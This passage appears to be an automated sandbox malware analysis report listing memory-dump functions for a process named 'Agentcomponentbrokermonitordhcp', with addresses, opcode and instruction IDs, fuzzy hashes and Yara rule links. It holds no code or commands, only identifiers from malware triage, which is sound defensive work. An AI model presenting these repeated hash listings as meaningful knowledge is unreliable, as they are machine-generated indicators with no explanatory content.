                                                                                                                    • Instruction ID: 3127537b55da2f0840036449e8792bc3a77efda0e5ea2ec77de0f9f4f3ecb7dc
                                                                                                                    • Opcode Fuzzy Hash: 3a50159eb190117ffe39adfd1e0d7d6ac4d191efcef49dee77ed90f3d49795bc
                                                                                                                    • Instruction Fuzzy Hash: D7018671B0A90D5FE795EB9894667F9B3D1EF9C351F05007AE84CC3192DE2468458741
                                                                                                                    Function 00007FFD9B7D0C48 Relevance: .0, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d167957a3a6ee79d9bb93c829f0a2a2a01baf0ab89ce6582f7e9e480b09a27a5
                                                                                                                    • Instruction ID: b4f5acf3e3c05e02277c13f1e64851ed573baeef16d89b0ccfab120bbf785da2
                                                                                                                    • Opcode Fuzzy Hash: d167957a3a6ee79d9bb93c829f0a2a2a01baf0ab89ce6582f7e9e480b09a27a5
                                                                                                                    • Instruction Fuzzy Hash: 74018035A0E38D8FD722DB64886419C7FB0EF82744F5652E7C044DB1B2D9345A49C781
                                                                                                                    Function 00007FFD9B7D0C50 Relevance: .0, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7abed21daf98ba931be0167567b0b3f850c6b1b12065ae342043b072ec06ce63
                                                                                                                    • Instruction ID: f07d7271f2b6384ab7b015e3633c89eb88e7cddb7370521e0bfaca12a039558a
                                                                                                                    • Opcode Fuzzy Hash: 7abed21daf98ba931be0167567b0b3f850c6b1b12065ae342043b072ec06ce63
                                                                                                                    • Instruction Fuzzy Hash: C5017134E0E38D9FE722DBA4886419D7FB0EF42744F5543E7C048C71A2D9385A48C741
                                                                                                                    Function 00007FFD9B80A9D9 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6a214c7d0bfd4c0fb1ee5aafc05cdb75a035fcd081ba11a9fbe6af8534f12035
                                                                                                                    • Instruction ID: a8b0b0136258823b3d5c6bff608e8a34d9f5bb5cfd45c060402a50d599943829
                                                                                                                    • Opcode Fuzzy Hash: 6a214c7d0bfd4c0fb1ee5aafc05cdb75a035fcd081ba11a9fbe6af8534f12035
                                                                                                                    • Instruction Fuzzy Hash: EBF02B21B1DBC40FC71A5A2998654A17BF1DF5B20134A01FBD487CB2A3DD19EC858351
                                                                                                                    Function 00007FFD9B7D5E02 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c5e764543b0e4f6656d70b36b328efce14eb8897b403496decde122275b02e3f
                                                                                                                    • Instruction ID: 5281dd4750545d2eeceb98931bad018e4492c36a70bd182d83a11220e6e38cdd
                                                                                                                    • Opcode Fuzzy Hash: c5e764543b0e4f6656d70b36b328efce14eb8897b403496decde122275b02e3f
                                                                                                                    • Instruction Fuzzy Hash: C8F0C231648A0A8FCB54DF04C494FA973F1FBA8351F1586A9D00ED72A0DA34AA85DF81
                                                                                                                    Function 00007FFD9B7E4B7A Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7e0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f747cd76a50f8eaafc175bb5992f446a053f3789100cc4f1f6c70f3d0c472a88
                                                                                                                    • Instruction ID: 928c070d74d26ccce10167143bd1c06356ae35c5ebcfbe662cdca401fc802eaf
                                                                                                                    • Opcode Fuzzy Hash: f747cd76a50f8eaafc175bb5992f446a053f3789100cc4f1f6c70f3d0c472a88
                                                                                                                    • Instruction Fuzzy Hash: BCF0B430B0D21E4BEE75AA8894605BC3350EF94310F030378D40EC31BBCD28AA064284
                                                                                                                    Function 00007FFD9B80B7B0 Relevance: .0, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a3ac26a6bd917dab9a66afb60f84bdefc0bf9187c1d08abc1ff8faa564529da9
                                                                                                                    • Instruction ID: dbebe2a77b4d3de2b8f41ec8164a8b650ee7ddbc61fa246fed0ee07b12bf9b02
                                                                                                                    • Opcode Fuzzy Hash: a3ac26a6bd917dab9a66afb60f84bdefc0bf9187c1d08abc1ff8faa564529da9
                                                                                                                    • Instruction Fuzzy Hash: 53F0EC26B585414BD308F72CD8F58E433A0DF4612A74981F2D04ECE1A7DD1594488750
                                                                                                                    Function 00007FFD9B8079D3 Relevance: .0, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 56814d0bc372d442043a2ee71ef02d2861c87ff482bb0cd57b77c56c2ad34b65
                                                                                                                    • Instruction ID: 431dfdbf7836d8e52bbd6fdb90ea7bdc0409a64170a6d9dc5feaf5feac4dd13d
                                                                                                                    • Opcode Fuzzy Hash: 56814d0bc372d442043a2ee71ef02d2861c87ff482bb0cd57b77c56c2ad34b65
                                                                                                                    • Instruction Fuzzy Hash: E6F0E226F0F6855FD3291B7848754A43B609F6F26170B00F7C099CB5F3DC19AD048701
                                                                                                                    Function 00007FFD9B7FCB49 Relevance: .0, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 11e72db5e8bafde69ce7393efd214c18862aea70d9226c1ec66b1011b54606d2
                                                                                                                    • Instruction ID: e8df105daa0a2ce2a4ab427905eacd71cd44c439d26d2e660c524099327813fb
                                                                                                                    • Opcode Fuzzy Hash: 11e72db5e8bafde69ce7393efd214c18862aea70d9226c1ec66b1011b54606d2
                                                                                                                    • Instruction Fuzzy Hash: 15F0396092D7C44FC702AB3888544247FF0EF1710978A02EBD4CACA5B3EA19884AC312
                                                                                                                    Function 00007FFD9B802CE9 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 25f7dcac7f94a606b9968431c9d73ad2c48ee120ae991e56abe1da4e0246abcc
                                                                                                                    • Instruction ID: 0111817a30ab5ef83f69fe8e8f49f1be3715bd128e749241e63f8ebd7d7b609e
                                                                                                                    • Opcode Fuzzy Hash: 25f7dcac7f94a606b9968431c9d73ad2c48ee120ae991e56abe1da4e0246abcc
                                                                                                                    • Instruction Fuzzy Hash: FAE0D82071AB884FC70D9B3888684607BB1EFA611278952EBC405CB2E3ED19DC89C751
                                                                                                                    Function 00007FFD9B7F5BF9 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d6d8a4b2683d4f5c1c10896849afd54f99ed7eff97fcf72542c9ccec68b240ad
                                                                                                                    • Instruction ID: 76610f001d81add3ddac74f65ac82acaad5bf9a4de00e9800882e203a8674509
                                                                                                                    • Opcode Fuzzy Hash: d6d8a4b2683d4f5c1c10896849afd54f99ed7eff97fcf72542c9ccec68b240ad
                                                                                                                    • Instruction Fuzzy Hash: 80E09220B9E7C40FCB0AA63848680607FB1EF6B10178D12FAC486CB293D918DC8AC751
                                                                                                                    Function 00007FFD9B7FE279 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb4da9fbff92f6316001d3a1e27a52cebcdf001950c02f931d2a358ff1bf2384
                                                                                                                    • Instruction ID: 248747f82cb998ff603068f7baafd5ecf08322b978490b6183e3774c05b9c8ec
                                                                                                                    • Opcode Fuzzy Hash: bb4da9fbff92f6316001d3a1e27a52cebcdf001950c02f931d2a358ff1bf2384
                                                                                                                    • Instruction Fuzzy Hash: DEE09220B197844FC709963888644607BB1EF6B11278A52FAC446CB2A3E919DC85C741
                                                                                                                    Function 00007FFD9B80AA69 Relevance: .0, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8614cdcb45eb7306ba3fecf2eef229044448bccd30f6c508e677621028d00cbf
                                                                                                                    • Instruction ID: 73cdc400db3dde50ad1e6cfb4e978f96d26da2d403daffe184784edd3e5150bb
                                                                                                                    • Opcode Fuzzy Hash: 8614cdcb45eb7306ba3fecf2eef229044448bccd30f6c508e677621028d00cbf
                                                                                                                    • Instruction Fuzzy Hash: 82E08020649B444FC7096B2488955503BB1DF6721174A00E6D045CF1B3D51DDC49C711
                                                                                                                    Function 00007FFD9B7F9599 Relevance: .0, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7F3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7f3000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a5f80d24f667998ca5de3758d196b17777faa567545b17df32dcd8966acbc99b
                                                                                                                    • Instruction ID: 78efd57a7ff3205cd55a5aa2e3c9dec7a0693971833c074c5cc5e12571a5c406
                                                                                                                    • Opcode Fuzzy Hash: a5f80d24f667998ca5de3758d196b17777faa567545b17df32dcd8966acbc99b
                                                                                                                    • Instruction Fuzzy Hash: 74E08631A497844FCB0EAB288CA99503BB0EF6A215B8A00DBC005CB5B3E61DDC49C701
                                                                                                                    Function 00007FFD9B807989 Relevance: .0, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 17cb1c085d52b71206f0d04146f224996cca75b8caeedddea856ff774b7f3837
                                                                                                                    • Instruction ID: 08ec8335363fc9ff44d20f9e745f283ee9189c3f77d61ac280bb3958de3c401b
                                                                                                                    • Opcode Fuzzy Hash: 17cb1c085d52b71206f0d04146f224996cca75b8caeedddea856ff774b7f3837
                                                                                                                    • Instruction Fuzzy Hash: 04E01A2194F7C04FC74B9B3588A88447F71AE1721074A51EBC085CF5B3EA2D9849C712
                                                                                                                    Function 00007FFD9B80D959 Relevance: .0, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 94f1942c652ebc860121753ddcb4975fd86ee220e937a30b52f0c489cf959cb2
                                                                                                                    • Instruction ID: f6de05e86d487be5f64c3e75d67cbcc49a2e1bd894edda6952261ef2ad7c503a
                                                                                                                    • Opcode Fuzzy Hash: 94f1942c652ebc860121753ddcb4975fd86ee220e937a30b52f0c489cf959cb2
                                                                                                                    • Instruction Fuzzy Hash: 3BE04F21689B804FC70A5B2488698943BB1DF6721178A40EBC045CF2B3D61AD849C711
                                                                                                                    Function 00007FFD9B80A540 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Function 00007FFD9B80A4B0 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Function 00007FFD9B7D1DC0 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
                                                                                                                    • Instruction ID: a80aa5bfc48d3786a4a59c8d186a66ea9d43c30f7b6595992bbdd9d73dbd579e
                                                                                                                    • Opcode Fuzzy Hash: ff3051ce8f092a69e22551edfefc58e64b516ddd8f195051f1ddaf51897b9e82
                                                                                                                    • Instruction Fuzzy Hash: CDE09A70F0D21E87F768A284D8613E87264EBC8340F152378DA0E933E1CE28AE098615
                                                                                                                    Function 00007FFD9B80D8D9 Relevance: .0, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8cbaff0bf46a2870c1cc636a50959592d8509357eac7a33f2741d8249b744a69
                                                                                                                    • Instruction ID: f092c37fb61501de1d7d9567622ca6afd785f4e2401d8c7ce2d0044285a5d487
                                                                                                                    • Opcode Fuzzy Hash: 8cbaff0bf46a2870c1cc636a50959592d8509357eac7a33f2741d8249b744a69
                                                                                                                    • Instruction Fuzzy Hash: 80E04F2194F7C04FC70B973488B88447F60DE1721078E40EAC085CF5B3EA198849C701
                                                                                                                    Function 00007FFD9B80CC29 Relevance: .0, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3929cfd827c69090c6282b0b63111c03cce786f7e2340c836ba06b9c226d2eb5
                                                                                                                    • Instruction ID: d246816b3b619ddbbd259bff5ce5d603c1c5b174f8aa51356f17f622bcc1e232
                                                                                                                    • Opcode Fuzzy Hash: 3929cfd827c69090c6282b0b63111c03cce786f7e2340c836ba06b9c226d2eb5
                                                                                                                    • Instruction Fuzzy Hash: 51E0EC2154EA844FC70A9B2488A99943FB0EF2621178A01E6C449CF5B3E65A9C89C752
                                                                                                                    Function 00007FFD9B801AF0 Relevance: .0, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                    Function 00007FFD9B80B7D8 Relevance: .0, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 326fddfa3e6338c3e5d2f0e00ff13dfa1b6452360b5d368467cabd64d0f95c06
                                                                                                                    • Instruction ID: db5c5ec157326e3d5525c09028612764162e24c9b5b858856863f12583aef4a5
                                                                                                                    • Opcode Fuzzy Hash: 326fddfa3e6338c3e5d2f0e00ff13dfa1b6452360b5d368467cabd64d0f95c06
                                                                                                                    • Instruction Fuzzy Hash: ACD02230B509040FC71CA73C8C588703390EBAE20278100A8D00BC72B2D92ADC89C740
                                                                                                                    Function 00007FFD9B806F10 Relevance: .0, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B801000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B801000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b801000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                    • Instruction ID: edc95da55bbf175c2dbf557ae9e990bb90a5868c6e144bfcc50b23835cab04b0
                                                                                                                    • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                    • Instruction Fuzzy Hash: 4ED01234B519044FC71CA73C88598747391EB6E2167D540A9D00AC72B5E96ADD89C781
                                                                                                                    Function 00007FFD9B7E82FE Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7e0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5fb8d9d9cda7e7fa439ae7f2e089c60b770e96dab7b1b55962544499104dd7c1
                                                                                                                    • Instruction ID: fbdd5c4b5fff347f9e6f1c977a1816f8087de09adc33b0b713bf33043c82925e
                                                                                                                    • Opcode Fuzzy Hash: 5fb8d9d9cda7e7fa439ae7f2e089c60b770e96dab7b1b55962544499104dd7c1
                                                                                                                    • Instruction Fuzzy Hash: 41E0EC30E0962ECAE7B0DB54C8947AC72A1BF08301F9503F5C00DA31B5CB796E819B41
                                                                                                                    Function 00007FFD9B7D0D34 Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction ID: a7ccde51ffaebf982fee43da4dd1b920e211f0f70841fa5207d4da50c9dd1c1f
                                                                                                                    • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction Fuzzy Hash: 0CE01234B0930ECBE710DB94C4A46ED7761EB91751F504365C405872E9DA786788C680
                                                                                                                    Function 00007FFD9B7E44BD Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7e0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9578c054b301df7c8b39f6782fcb4ed7e50c391fdec3e4de4dd0b57602318090
                                                                                                                    • Instruction ID: 5ea7ed31a174769e332b31e761317ddd96ab6c93a5f11321aba3437874b61459
                                                                                                                    • Opcode Fuzzy Hash: 9578c054b301df7c8b39f6782fcb4ed7e50c391fdec3e4de4dd0b57602318090
                                                                                                                    • Instruction Fuzzy Hash: C4D09E70E1895ECAEB58EB94C865ABDB6B1FF84304F410175D02D932EADF3C29024741
                                                                                                                    Function 00007FFD9B7D4960 Relevance: .0, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000002.1915368500.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_2_7ffd9b7d0000_Agentcomponentbrokermonitordhcp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
